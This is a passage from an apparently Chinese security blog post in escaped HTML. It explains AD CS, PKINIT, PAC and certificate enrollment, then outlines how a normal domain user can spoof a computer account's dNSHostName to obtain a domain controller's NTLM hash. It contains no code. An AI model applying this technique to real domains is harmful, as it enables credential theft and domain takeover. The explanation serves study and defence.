id=\"2%E3%80%81CA%E8%AF%81%E4%B9%A6%E9%A2%81%E5%8F%91%E6%9C%BA%E6%9E%84\"><\/span>2\u3001CA\u8bc1\u4e66\u9881\u53d1\u673a\u6784<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>CA\uff08Certificate Authority\uff0c\u8bc1\u4e66\u9881\u53d1\u673a\u6784\uff09\u662fPKI\u7cfb\u7edf\u7684\u6838\u5fc3\u3002\u5176\u4f5c\u7528\u5305\u62ec\u5904\u7406\u8bc1\u4e66\u7533\u8bf7\u3001 \u8bc1\u4e66\u53d1\u653e\u3001 \u8bc1\u4e66\u66f4\u65b0\u3001\u7ba1\u7406\u5df2\u9881\u53d1\u7684\u8bc1\u4e66\u3001\u540a\u9500\u8bc1\u4e66\u548c\u53d1\u5e03\u8bc1\u4e66\u540a\u9500\u5217\u8868(CRL)\u7b49\u3002<\/p>\n<p>Active Directory\u8bc1\u4e66\u670d\u52a1\u4e2d\u7684CA\u6709\u4f01\u4e1aCA\u548c\u72ec\u7acbCA\u3002\u4f01\u4e1aCA\u5fc5\u987b\u662f\u57df\u6210\u5458\uff0c\u5e76\u4e14\u901a\u5e38\u5904\u4e8e\u8054\u673a\u72b6\u6001\u4ee5\u9881\u53d1\u8bc1\u4e66\u6216\u8bc1\u4e66\u7b56\u7565\u3002\u800c\u72ec\u7acbCA\u53ef\u4ee5\u662f\u6210\u5458\u3001\u5de5\u4f5c\u7ec4\u6216\u57df\u3002\u72ec\u7acbCA\u4e0d\u9700\u8981ADDS\u6d3b\u52a8\u76ee\u5f55\u57df\u670d\u52a1\uff0c\u5e76\u4e14\u53ef\u4ee5\u5728\u6ca1\u6709\u7f51\u7edc\u7684\u60c5\u51b5\u4e0b\u4f7f\u7528\u3002\u4f46\u662f\u5728\u57df\u4e2d\u57fa\u672c\u90fd\u662f\u4f7f\u7528\u4f01\u4e1aCA\uff0c\u56e0\u4e3a\u4f01\u4e1aCA\u53ef\u4ee5\u548c\u6d3b\u52a8\u76ee\u5f55\u57df\u670d\u52a1ADDS\u8fdb\u884c\u7ed3\u5408\uff0c\u5176\u4fe1\u606f\u4e5f\u5b58\u50a8\u5728Active Directory\u6570\u636e\u5e93\u4e2d\u3002\u4f01\u4e1aCA\u652f\u6301\u57fa\u4e8e\u8bc1\u4e66\u6a21\u5757\u521b\u5efa\u8bc1\u4e66\u548c\u81ea\u52a8\u6ce8\u518c\u8bc1\u4e66\u3002<\/p>\n<p>CA\u62e5\u6709\u516c\u94a5\u548c\u79c1\u94a5\uff1a<\/p>\n<ul>\n<li>\u79c1\u94a5\u53ea\u6709CA\u77e5\u9053\uff0c\u79c1\u94a5\u7528\u4e8e\u5bf9\u9881\u53d1\u7684\u8bc1\u4e66\u8fdb\u884c\u6570\u5b57\u7b7e\u540d<\/li>\n<li>\u516c\u94a5\u4efb\u4f55\u4eba\u90fd\u53ef\u4ee5\u77e5\u9053\uff0c\u516c\u94a5\u7528\u4e8e\u9a8c\u8bc1\u8bc1\u4e66\u662f\u5426\u7531CA\u9881\u53d1<\/li>\n<\/ul>\n<h3><span class=\"ez-toc-section\" id=\"3%E3%80%81PKINIT_Kerberos%E8%AE%A4%E8%AF%81\"><\/span>3\u3001PKINIT Kerberos\u8ba4\u8bc1<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>\u4e00\u822c\u60c5\u51b5\u4e0bKerberos\u534f\u8bae\u5728AS-REQ\u8bf7\u6c42\u8fc7\u7a0b\u4e2d\uff0c\u662f\u901a\u8fc7\u7528\u6237hash\u52a0\u5bc6\u65f6\u95f4\u6233\u6765\u8fdb\u884cKerberos\u9884\u8eab\u4efd\u8ba4\u8bc1\u3002\u4f46ADCS\u670d\u52a1\u53ef\u4ee5\u548cADDS\u7d27\u5bc6\u642d\u914d\u4f7f\u7528\uff0c\u6240\u4ee5\u5229\u7528\u8bc1\u4e66\u4e5f\u53ef\u4ee5\u8fdb\u884cKerberos\u9884\u8eab\u4efd\u8ba4\u8bc1\u3002<\/p>\n<blockquote>\n<p><a href=\"https:\/\/www.rfc-editor.org\/rfc\/rfc4556.html\">RFC4556 Public Key Cryptography for Initial Authentication in Kerberos (PKINIT)<\/a> \u5f15\u5165\u4e86\u5bf9Kerberos\u9884\u8eab\u4efd\u9a8c\u8bc1\u7684\u516c\u94a5\u52a0\u5bc6\u6280\u672f\u652f\u6301\uff0c\u53ef\u4ee5\u4f7f\u7528\u8bc1\u4e66\u7684\u79c1\u94a5\u6765\u8fdb\u884cKerberos\u9884\u8eab\u4efd\u8ba4\u8bc1\u3002<\/p>\n<\/blockquote>\n<p>\u6b64\u5916\uff0c\u4e3a\u4e86\u652f\u6301\u8fde\u63a5\u5230\u4e0d\u652f\u6301Kerberos\u8eab\u4efd\u9a8c\u8bc1\u7684\u7f51\u7edc\u670d\u52a1\u7684\u5e94\u7528\u7a0b\u5e8f\u7684NTLM\u8eab\u4efd\u9a8c\u8bc1\uff0cKDC\u4f1a\u5728PAC\u7279\u6743\u5c5e\u6027\u8bc1\u4e66\u7684PAC_CREDENTIAL_INFO\u7f13\u51b2\u533a\u4e2d\u8fd4\u56de\u7528\u6237\u7684NTLM Hash\uff0c\u4e5f\u5c31\u662f\u8bf4\u5f53\u4f7f\u7528\u8bc1\u4e66\u8fdb\u884cKerberos\u8ba4\u8bc1\u65f6\uff0c\u8fd4\u56de\u7684\u7968\u636e\u7684PAC\u4e2d\u662f\u5305\u542b\u7528\u6237\u7684NTLM Hash\u7684\uff0c\u800c\u4e14\u65e0\u8bba\u4ee5\u540e\u7528\u6237\u5982\u4f55\u66f4\u6539\u5bc6\u7801\uff0c\u8fd4\u56de\u7684NTLM Hash\u90fd\u662f\u5f53\u524d\u7528\u6237\u6700\u65b0\u7684\u3002<\/p>\n<h4><span class=\"ez-toc-section\" id=\"%EF%BC%881%EF%BC%89%E4%BB%80%E4%B9%88%E6%98%AFPAC\"><\/span>\uff081\uff09\u4ec0\u4e48\u662fPAC<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<p>PAC \u901a\u5e38\u6307\u7684\u662f &quot;Privilege Attribute Certificate&quot;\uff0c\u5b83\u4e0eKerberos\u8ba4\u8bc1\u534f\u8bae\u76f8\u5173\u3002\u5728Active Directory\u73af\u5883\u4e2d\uff0c\u5f53\u7528\u6237\u6216\u670d\u52a1\u4f7f\u7528Kerberos\u8fdb\u884c\u8eab\u4efd\u9a8c\u8bc1\u65f6\uff0cPAC\u5305\u542b\u5728Kerberos\u7968\u8bc1\u4e2d\uff08\u7279\u522b\u662f\u5728TGT\u548cservice ticket\u4e2d\uff09\u3002<\/p>\n<p>\u4ee5\u4e0b\u662fPAC\u7684\u4e3b\u8981\u7279\u70b9\u548c\u5185\u5bb9\uff1a<\/p>\n<ul>\n<li>\n<p><strong>\u7528\u6237\u7684\u5b89\u5168\u6807\u8bc6\u7b26 (SID)<\/strong>\uff1a\u8fd9\u662f\u7528\u6237\u7684\u552f\u4e00\u6807\u8bc6\u7b26\uff0c\u4ee5\u53ca\u7528\u6237\u6240\u5c5e\u7684\u6240\u6709\u7ec4\u7684SID\u3002<\/p>\n<\/li>\n<li>\n<p><strong>\u7528\u6237\u7684\u6743\u9650\u548c\u7ec4\u6210\u5458\u8d44\u683c<\/strong>\uff1a\u8fd9\u5305\u62ec\u7528\u6237\u5728\u57df\u4e2d\u7684\u6240\u6709\u7ec4\u6210\u5458\u8d44\u683c\uff0c\u65e0\u8bba\u5b83\u4eec\u662f\u76f4\u63a5\u7684\u8fd8\u662f\u5d4c\u5957\u7684\u3002<\/p>\n<\/li>\n<li>\n<p><strong>\u8eab\u4efd\u9a8c\u8bc1\u4fe1\u606f<\/strong>\uff1aPAC\u5305\u542b\u5173\u4e8e\u7528\u6237\u7684\u5176\u4ed6\u9a8c\u8bc1\u4fe1\u606f\uff0c\u8fd9\u6709\u52a9\u4e8e\u670d\u52a1\u786e\u5b9a\u7528\u6237\u7684\u8eab\u4efd\u548c\u6743\u9650\u3002<\/p>\n<\/li>\n<li>\n<p><strong>\u52a0\u5bc6<\/strong>\uff1a\u4e3a\u4e86\u4fdd\u8bc1\u5b89\u5168\uff0cPAC\u7684\u5185\u5bb9\u662f\u52a0\u5bc6\u7684\uff0c\u53ea\u6709\u5177\u6709\u6b63\u786e\u5bc6\u94a5\u7684\u670d\u52a1\u624d\u80fd\u89e3\u5bc6\u5b83\u3002<\/p>\n<\/li>\n<\/ul>\n<p>PAC\u7684\u5b58\u5728\u6709\u52a9\u4e8e\u63d0\u9ad8\u6548\u7387\uff0c\u56e0\u4e3a\u4e00\u65e6\u7528\u6237\u5f97\u5230\u4e00\u4e2aKerberos\u7968\u636e\uff0c\u4ed6\u4eec\u5c31\u4e0d\u9700\u8981\u518d\u6b21\u67e5\u8be2Active Directory\u6765\u786e\u5b9a\u4ed6\u4eec\u7684\u6743\u9650\u6216\u7ec4\u6210\u5458\u8d44\u683c\u3002\u76f8\u53cd\uff0c\u8fd9\u4e9b\u4fe1\u606f\u90fd\u5305\u542b\u5728PAC\u4e2d\uff0c\u5e76\u968f\u7968\u636e\u4e00\u8d77\u53d1\u9001\u3002<\/p>\n<p>\u7136\u800c\uff0cPAC\u4e5f\u53ef\u80fd\u589e\u52a0\u7968\u636e\u7684\u5927\u5c0f\uff0c\u7279\u522b\u662f\u5f53\u7528\u6237\u662f\u5f88\u591a\u7ec4\u7684\u6210\u5458\u65f6\u3002\u8fd9\u53ef\u80fd\u4f1a\u5bfc\u81f4\u4e00\u4e9b\u95ee\u9898\uff0c\u4f8b\u5982\u5982\u679c\u7968\u636e\u592a\u5927\u800c\u4e0d\u80fd\u9002\u5e94\u7f51\u7edc\u5305\u3002\u4e3a\u4e86\u89e3\u51b3\u8fd9\u4e2a\u95ee\u9898\uff0c\u6709\u65f6\u53ef\u80fd\u9700\u8981\u8c03\u6574\u76f8\u5173\u7684\u914d\u7f6e\u6216\u51cf\u5c11\u7528\u6237\u7684\u7ec4\u6210\u5458\u8d44\u683c\u3002<\/p>\n<p>\u603b\u7684\u6765\u8bf4\uff0cPAC\u662fKerberos\u5728Active Directory\u73af\u5883\u4e2d\u7684\u4e00\u4e2a\u91cd\u8981\u7ec4\u6210\u90e8\u5206\uff0c\u5b83\u5e2e\u52a9\u670d\u52a1\u5feb\u901f\u786e\u5b9a\u7528\u6237\u7684\u6743\u9650\u548c\u8eab\u4efd\uff0c\u800c\u65e0\u9700\u518d\u6b21\u67e5\u8be2AD\u3002<\/p>\n<h4><span class=\"ez-toc-section\" id=\"%EF%BC%882%EF%BC%89%E4%BB%80%E4%B9%88%E6%98%AFPKINIT\"><\/span>\uff082\uff09\u4ec0\u4e48\u662fPKINIT<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<p>PKINIT\uff08Public Key Cryptography for Initial Authentication\uff09\u662fKerberos\u8eab\u4efd\u9a8c\u8bc1\u534f\u8bae\u7684\u4e00\u4e2a\u6269\u5c55\u3002\u5b83\u5141\u8bb8Kerberos\u7684\u521d\u59cb\u8eab\u4efd\u9a8c\u8bc1\u4f7f\u7528\u516c\u94a5\u52a0\u5bc6\u6280\u672f\uff0c\u800c\u4e0d\u662f\u4f20\u7edf\u7684\u5bc6\u7801\u3002<\/p>\n<p>\u5177\u4f53\u6765\u8bf4\uff0c\u8fd9\u662f\u5982\u4f55\u5de5\u4f5c\u7684\uff1a<\/p>\n<ul>\n<li>\n<p><strong>\u516c\u94a5\u8bc1\u4e66<\/strong>\uff1a\u5728PKINIT\u4e2d\uff0c\u7528\u6237\u6216\u670d\u52a1\u62e5\u6709\u4e00\u4e2a\u516c\u94a5\u8bc1\u4e66\uff08\u901a\u5e38\u662fX.509\u683c\u5f0f\uff09\u3002<\/p>\n<\/li>\n<li>\n<p><strong>\u521d\u59cb\u8eab\u4efd\u9a8c\u8bc1<\/strong>\uff1a\u5f53\u7528\u6237\u5c1d\u8bd5\u8fdb\u884cKerberos\u8eab\u4efd\u9a8c\u8bc1\u65f6\uff0c\u4ed6\u4eec\u53ef\u4ee5\u4f7f\u7528\u5176\u79c1\u94a5\u5bf9\u67d0\u4e9b\u4fe1\u606f\u8fdb\u884c\u7b7e\u540d\uff0c\u7136\u540e\u5c06\u7b7e\u540d\u7684\u4fe1\u606f\u4e0e\u5176\u516c\u94a5\u8bc1\u4e66\u4e00\u8d77\u53d1\u9001\u7ed9KDC\uff08Key Distribution Center\uff09\u3002KDC\u9a8c\u8bc1\u7b7e\u540d\u5e76\u68c0\u67e5\u8bc1\u4e66\u7684\u6709\u6548\u6027\uff08\u901a\u5e38\u4e0e\u4fe1\u4efb\u7684\u8bc1\u4e66\u9881\u53d1\u673a\u6784\u5217\u8868\u8fdb\u884c\u6bd4\u8f83\uff09\u3002<\/p>\n<\/li>\n<li>\n<p><strong>\u7968\u636e\u9881\u53d1<\/strong>\uff1a\u4e00\u65e6KDC\u9a8c\u8bc1\u4e86\u7528\u6237\u7684\u8eab\u4efd\uff0c\u5b83\u5c06\u50cf\u5f80\u5e38\u4e00\u6837\u9881\u53d1\u4e00\u4e2aTGT\uff08Ticket Granting Ticket\uff09\u3002<\/p>\n<\/li>\n<\/ul>\n<p>\u8fd9\u79cd\u65b9\u6cd5\u7684\u597d\u5904\u662f\uff1a<\/p>\n<ul>\n<li><strong>\u589e\u5f3a\u7684\u5b89\u5168\u6027<\/strong>\uff1a\u516c\u94a5\u52a0\u5bc6\u6280\u672f\u63d0\u4f9b\u4e86\u6bd4\u4f20\u7edf\u5bc6\u7801\u66f4\u5f3a\u5927\u7684\u5b89\u5168\u6027\u3002<\/li>\n<li><strong>\u667a\u80fd\u5361\u652f\u6301<\/strong>\uff1aPKINIT\u5e38\u5e38\u4e0e\u667a\u80fd\u5361\u7ed3\u5408\u4f7f\u7528\u3002\u7528\u6237\u7684\u8bc1\u4e66\u548c\u79c1\u94a5\u5b58\u50a8\u5728\u667a\u80fd\u5361\u4e0a\uff0c\u4f7f\u5f97\u8eab\u4efd\u9a8c\u8bc1\u8fc7\u7a0b\u66f4\u4e3a\u5b89\u5168\u3002<\/li>\n<\/ul>\n<p>\u7f3a\u70b9\uff1a<\/p>\n<ul>\n<li><strong>\u590d\u6742\u6027<\/strong>\uff1a\u90e8\u7f72\u548c\u7ba1\u7406PKI\uff08Public Key Infrastructure\uff09\u53ef\u80fd\u4f1a\u589e\u52a0\u590d\u6742\u6027\u548c\u5f00\u9500\u3002<\/li>\n<li><strong>\u4f9d\u8d56\u4e8e\u8bc1\u4e66<\/strong>\uff1a\u8bc1\u4e66\u7684\u8fc7\u671f\u3001\u64a4\u9500\u6216\u5176\u4ed6\u95ee\u9898\u53ef\u80fd\u4f1a\u5bfc\u81f4\u8eab\u4efd\u9a8c\u8bc1\u5931\u8d25\u3002<\/li>\n<\/ul>\n<p>\u603b\u4e4b\uff0cPKINIT\u4e3aKerberos\u63d0\u4f9b\u4e86\u4e00\u4e2a\u66f4\u5b89\u5168\u7684\u8eab\u4efd\u9a8c\u8bc1\u65b9\u6cd5\uff0c\u5c24\u5176\u662f\u5f53\u7ed3\u5408\u4f7f\u7528\u667a\u80fd\u5361\u65f6\u3002<\/p>\n<h3><span class=\"ez-toc-section\" id=\"4%E3%80%81%E8%AF%81%E4%B9%A6%E6%A8%A1%E6%9D%BF\"><\/span>4\u3001\u8bc1\u4e66\u6a21\u677f<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>\u8bc1\u4e66\u6a21\u677fCertificate Templates\u662fCA\u8bc1\u4e66\u9881\u53d1\u673a\u6784\u7684\u4e00\u4e2a\u7ec4\u6210\u90e8\u5206\uff0c\u662f\u8bc1\u4e66\u7b56\u7565\u4e2d\u7684\u91cd\u8981\u5143\u7d20\uff0c\u662f\u7528\u4e8e\u8bc1\u4e66\u6ce8\u518c\u3001\u4f7f\u7528\u548c\u7ba1\u7406\u7684\u4e00\u7ec4\u89c4\u5219\u548c\u683c\u5f0f\u3002\u5f53CA\u6536\u5230\u5bf9\u8bc1\u4e66\u7684\u8bf7\u6c42\u65f6\uff0c\u5fc5\u987b\u5bf9\u8be5\u8bf7\u6c42\u5e94\u7528\u4e00\u7ec4\u89c4\u5219\u548c\u8bbe\u7f6e\uff0c\u4ee5\u6267\u884c\u6240\u8bf7\u6c42\u7684\u529f\u80fd\uff0c\u4f8b\u5982\u8bc1\u4e66\u9881\u53d1\u6216\u66f4\u65b0\u3002\u8fd9\u4e9b\u89c4\u5219\u53ef\u4ee5\u662f\u7b80\u5355\u7684\uff0c\u4e5f\u53ef\u4ee5\u662f\u590d\u6742\u7684\uff0c\u4e5f\u53ef\u4ee5\u9002\u7528\u4e8e\u6240\u6709\u7528\u6237\u6216\u7279\u5b9a\u7684\u7528\u6237\u7ec4\u3002\u8bc1\u4e66\u6a21\u677f\u662f\u5728CA\u4e0a\u914d\u7f6e\u5e76\u5e94\u7528\u4e8e\u4f20\u5165\u8bc1\u4e66\u8bf7\u6c42\u7684\u4e00\u7ec4\u89c4\u5219\u548c\u8bbe\u7f6e\u3002\u8bc1\u4e66\u6a21\u677f\u8fd8\u5411\u5ba2\u6237\u673a\u63d0\u4f9b\u4e86\u5173\u4e8e\u5982\u4f55\u521b\u5efa\u548c\u63d0\u4ea4\u6709\u6548\u7684\u8bc1\u4e66\u8bf7\u6c42\u7684\u8bf4\u660e\u3002\u57fa\u4e8e\u8bc1\u4e66\u6a21\u677f\u7684\u8bc1\u4e66\u53ea\u80fd\u7531\u4f01\u4e1aCA\u9881\u53d1\u3002\u8fd9\u4e9b\u6a21\u677f\u5b58\u50a8\u5728\u6d3b\u52a8\u76ee\u5f55\u57df\u670d\u52a1(ADDS)\u4e2d\uff0c\u4ee5\u4f9b\u6797\u4e2d\u7684\u6bcf\u4e2aCA\u4f7f\u7528\u3002\u8fd9\u5141\u8bb8CA\u59cb\u7ec8\u80fd\u591f\u8bbf\u95ee\u5f53\u524d\u6807\u51c6\u6a21\u677f\uff0c\u5e76\u786e\u4fdd\u8de8\u6797\u4e00\u81f4\u7684\u5e94\u7528\u3002<\/p>\n<p>\u8bc1\u4e66\u6a21\u677f\u901a\u8fc7\u5141\u8bb8\u7ba1\u7406\u5458\u53d1\u5e03\u5df2\u4e3a\u9009\u5b9a\u4efb\u52a1\u9884\u5148\u914d\u7f6e\u7684\u8bc1\u4e66\uff0c\u53ef\u4ee5\u5927\u5927\u7b80\u5316\u7ba1\u7406\u8bc1\u4e66\u9881\u53d1\u673a\u6784(CA)\u7684\u4efb\u52a1\u3002\u8bc1\u4e66\u6a21\u677f\u7ba1\u7406\u5355\u5143\u5141\u8bb8\u7ba1\u7406\u5458\u6267\u884c\u4ee5\u4e0b\u4efb\u52a1\uff1a<\/p>\n<ul>\n<li>\u67e5\u770b\u6bcf\u4e2a\u8bc1\u4e66\u6a21\u677f\u7684\u5c5e\u6027<\/li>\n<li>\u590d\u5236\u548c\u4fee\u6539\u8bc1\u4e66\u6a21\u677f<\/li>\n<li>\u63a7\u5236\u54ea\u4e9b\u7528\u6237\u548c\u8ba1\u7b97\u673a\u53ef\u4ee5\u8bfb\u53d6\u6a21\u677f\u5e76\u6ce8\u518c\u8bc1\u4e66<\/li>\n<li>\u6267\u884c\u4e0e\u8bc1\u4e66\u6a21\u677f\u76f8\u5173\u7684\u5176\u4ed6\u7ba1\u7406\u4efb\u52a1<\/li>\n<\/ul>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27a3e9eb.\" alt=\"\" \/><\/p>\n<h3><span class=\"ez-toc-section\" id=\"5%E3%80%81%E8%AF%81%E4%B9%A6%E6%B3%A8%E5%86%8C\"><\/span>5\u3001\u8bc1\u4e66\u6ce8\u518c<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>\u4e0d\u540c\u6743\u9650\u7684\u57df\u7528\u6237\uff0c\u5728\u6ce8\u518c\u8bc1\u4e66\u65f6\uff0c\u53ea\u80fd\u6ce8\u518c\u5bf9\u5e94\u7684\u6a21\u677f\uff0c\u5728\u8bc1\u4e66\u6a21\u677f\u7684\u5b89\u5168\u5c5e\u6027\u4e2d\uff0c\u53ef\u4ee5\u770b\u5230\u54ea\u4e9b\u7528\u6237\u548c\u7ec4\u5177\u6709\u5f53\u524d\u8bc1\u4e66\u6a21\u677f\u7684\u6ce8\u518c\u6743\u9650\uff0c\u4e00\u4e2a\u8bc1\u4e66\u6ce8\u518c\u6d41\u7a0b\u5982\u4e0b\uff1a<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27a4b572.\" alt=\"\" \/><\/p>\n<ul>\n<li>\n<p>\u5ba2\u6237\u7aef\u751f\u6210\u4e00\u5bf9\u516c\u3001\u79c1\u94a5<\/p>\n<\/li>\n<li>\n<p>\u5ba2\u6237\u7aef\u751f\u6210\u8bc1\u4e66\u7b7e\u540d\u8bf7\u6c42(CSR\uff0cCertificate Signing Request)\uff0c\u91cc\u9762\u5305\u542b\u5ba2\u6237\u7aef\u751f\u6210\u7684\u516c\u94a5\u4ee5\u53ca\u8bf7\u6c42\u7684\u8bc1\u4e66\u6a21\u677f\u3001\u8bf7\u6c42\u7684\u4e3b\u4f53\u7b49\u4fe1\u606f\u3002\u6574\u4e2aCSR\u7528\u5ba2\u6237\u7aef\u7684\u79c1\u94a5\u7b7e\u540d\uff0c\u53d1\u9001\u7ed9CA\u3002<\/p>\n<\/li>\n<li>\n<p>CA\u6536\u5230\u8bf7\u6c42\u540e\uff0c\u4ece\u4e2d\u53d6\u51fa\u516c\u94a5\u5bf9CSR\u8fdb\u884c\u7b7e\u540d\u6821\u9a8c\u3002\u6821\u9a8c\u901a\u8fc7\u540e\u5224\u65ad\u5ba2\u6237\u7aef\u8bf7\u6c42\u7684\u8bc1\u4e66\u6a21\u677f\u662f\u5426\u5b58\u5728\uff0c\u5982\u679c\u5b58\u5728\uff0c\u6839\u636e\u8bc1\u4e66\u6a21\u677f\u4e2d\u7684\u5c5e\u6027\u5224\u65ad\u8bf7\u6c42\u7684\u4e3b\u4f53\u662f\u5426\u6709\u6743\u9650\u7533\u8bf7\u8be5\u8bc1\u4e66\u3002\u5982\u679c\u6709\u6743\u9650\uff0c\u5219\u8fd8\u8981\u6839\u636e\u5176\u4ed6\u5c5e\u6027\uff0c\u5982\uff1a\u53d1\u5e03\u8981\u6c42\u3001\u4f7f\u7528\u8005\u540d\u79f0\u3001\u6269\u5c55\u6765\u751f\u6210\u8bc1\u4e66\u3002<\/p>\n<\/li>\n<li>\n<p>CA\u4f7f\u7528\u5176\u79c1\u94a5\u7b7e\u540d\u751f\u6210\u7684\u8bc1\u4e66\u5e76\u53d1\u9001\u7ed9\u5ba2\u6237\u7aef\u3002<\/p>\n<\/li>\n<li>\n<p>\u5ba2\u6237\u7aef\u5b58\u50a8\u8be5\u8bc1\u4e66\u5728\u7cfb\u7edf\u4e2d\u3002<\/p>\n<\/li>\n<\/ul>\n<p>\u5982\u679c\u5728\u5b89\u88c5ADCS\u670d\u52a1\u7684\u65f6\u5019\uff0c\u52fe\u9009\u4e86\u201c\u8bc1\u4e66\u9881\u53d1\u673a\u6784Web\u6ce8\u518c\u201d\u9009\u9879\uff0c\u90a3\u4e48\u5219\u53ef\u4ee5\u901a\u8fc7Web\u65b9\u5f0f\u6765\u7533\u8bf7\u8bc1\u4e66\uff0c\u5982\u679c\u8bc1\u4e66\u7533\u8bf7\u7684Web\u9875\u9762\u652f\u6301NTLM\u8ba4\u8bc1\uff08\u9ed8\u8ba4\u652f\u6301\uff09\uff0c\u5219\u53ef\u80fd\u88abNTLM\u4e2d\u7ee7\u653b\u51fb:<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27a5cf95.\" alt=\"\" \/><\/p>\n<p>\u901a\u8fc7\u57df\u8d26\u53f7\u8ba4\u8bc1\u540e\u767b\u9646\uff1a<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27a66baa.\" alt=\"\" \/><\/p>\n<h4><span class=\"ez-toc-section\" id=\"%EF%BC%881%EF%BC%89%E6%99%AE%E9%80%9A%E5%9F%9F%E8%B4%A6%E5%8F%B7%E6%B3%A8%E5%86%8C%E8%AF%81%E4%B9%A6\"><\/span>\uff081\uff09\u666e\u901a\u57df\u8d26\u53f7\u6ce8\u518c\u8bc1\u4e66<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<p>\u666e\u901a\u57df\u8d26\u53f7\u7533\u8bf7\u8bc1\u4e66\u65f6\uff0cADCS\u670d\u52a1\u5668\u901a\u8fc7userPrincipalName\u6216sAMAccountName\u5c5e\u6027\u67e5\u627e\u5bf9\u5e94\u7528\u6237\uff0c\u5e76\u8fd4\u56dePAC\u548c\u7528\u6237Hash\uff0c\u800c\u8fd9\u4e24\u4e2a\u5c5e\u6027\u5728\u57df\u5185\u662f\u552f\u4e00\u7684\uff0c\u6240\u4ee5\u6574\u4e2a\u6d41\u7a0b\u53ef\u786e\u4fdd\u4e00\u4e00\u5bf9\u5e94\u5173\u7cfb\uff1a<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27a70f2a.\" alt=\"\" \/><\/p>\n<h4><span class=\"ez-toc-section\" id=\"%EF%BC%882%EF%BC%89%E8%AE%A1%E7%AE%97%E6%9C%BA%E8%B4%A6%E5%8F%B7%E6%B3%A8%E5%86%8C%E8%AF%81%E4%B9%A6\"><\/span>\uff082\uff09\u8ba1\u7b97\u673a\u8d26\u53f7\u6ce8\u518c\u8bc1\u4e66<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<ul>\n<li>\n<p>\u8ba1\u7b97\u673a\u8d26\u53f7\u5728\u6ca1\u6709\u8bbe\u7f6edNSHostName\u5c5e\u6027\u65f6\uff0cADCS\u670d\u52a1\u5668\u65e0\u6cd5\u5224\u65ad\u8bf7\u6c42\u673a\u5668\u7684\u8eab\u4efd\uff0c\u56e0\u6b64\u65e0\u6cd5\u751f\u6210\u8bc1\u4e66<\/p>\n<\/li>\n<li>\n<p>\u8ba1\u7b97\u673a\u8d26\u53f7\u8bbe\u7f6edNSHostName\u4e86\u5c5e\u6027\u65f6\uff0cADCS\u670d\u52a1\u5668\u6839\u636edNSHostName\u5c5e\u6027\u7684\u503c\u6765\u751f\u6210\u5bf9\u5e94\u8bc1\u4e66\uff0c\u5728\u6574\u4e2aADCS\u670d\u52a1\u5668\u751f\u6210\u673a\u5668\u8bc1\u4e66\u7684\u8fc7\u7a0b\u4e2d\uff0c\u53ea\u6709dNSHostName\u5c5e\u6027\u5f71\u54cd\u4e86\u8bc1\u4e66\u6240\u5c5e\u673a\u5668\u7684\u751f\u6210\u3002<\/p>\n<\/li>\n<li>\n<p>KDC\u5728\u6536\u5230\u673a\u5668\u8d26\u53f7PKINIT Kerberos\u8ba4\u8bc1\u65f6\uff0cKDC\u4f1a\u53d6\u51fa\u8bc1\u4e66\u4e2d\u201c\u4f7f\u7528\u8005\u53ef\u9009\u540d\u79f0\u201d\u4e2dDNS Name\u7684\u503c\uff0c\u7136\u540e\u67e5\u8be2sAMAccountName\u5c5e\u6027\u5bf9\u5e94\u7684\u6761\u76ee\uff0c\u7528\u8be5\u6761\u76ee\u7684\u6743\u9650\u751f\u6210PAC\uff0c\u5728\u8fd9\u4e2a\u8fc7\u7a0b\u5e76\u4e0d\u4f1a\u641c\u7d22\u548c\u6821\u9a8cdNSHostName\u5c5e\u6027\u3002<\/p>\n<\/li>\n<li>\n<p>\u56e0\u6b64\u53ea\u6709dNSHostName\u5c5e\u6027\u5f71\u54cdADCS\u670d\u52a1\u5668\u751f\u6210\u5bf9\u5e94\u673a\u5668\u7684\u8bc1\u4e66\uff0c\u5e76\u4e14\u5728\u57df\u5185dNSHostName\u5c5e\u6027\u5e76\u4e0d\u5177\u6709\u552f\u4e00\u6027\uff0c\u56e0\u6b64\u53ef\u4ee5\u5229\u7528\u666e\u901a\u57df\u7528\u6237\u521b\u5efa\u4e00\u4e2a\u65b0\u7684\u8ba1\u7b97\u673a\u8d26\u53f7\uff0c\u7136\u540e\u4fee\u6539\u8be5\u8ba1\u7b97\u673a\u8d26\u53f7\u7684dNSHostName\u5c5e\u6027\u4e3a\u57df\u63a7\u8ba1\u7b97\u673a\u8d26\u53f7\u540d\uff0c\u8fd9\u6837\u901a\u8fc7\u65b0\u6dfb\u52a0\u7684\u8ba1\u7b97\u673a\u8d26\u53f7\u7533\u8bf7\u8bc1\u4e66\uff0c\u5c31\u53ef\u4ee5\u6b3a\u9a97ADCS\u8fd4\u56de\u57df\u63a7\u8ba1\u7b97\u673a\u8d26\u53f7\u7684NTLM\u54c8\u5e0c<\/p>\n<\/li>\n<\/ul>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27a7a2be.\" alt=\"\" \/><\/p>\n<h2><span class=\"ez-toc-section\" id=\"%E4%BA%8C%E3%80%81%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6\"><\/span>\u4e8c\u3001\u5229\u7528\u6761\u4ef6<span 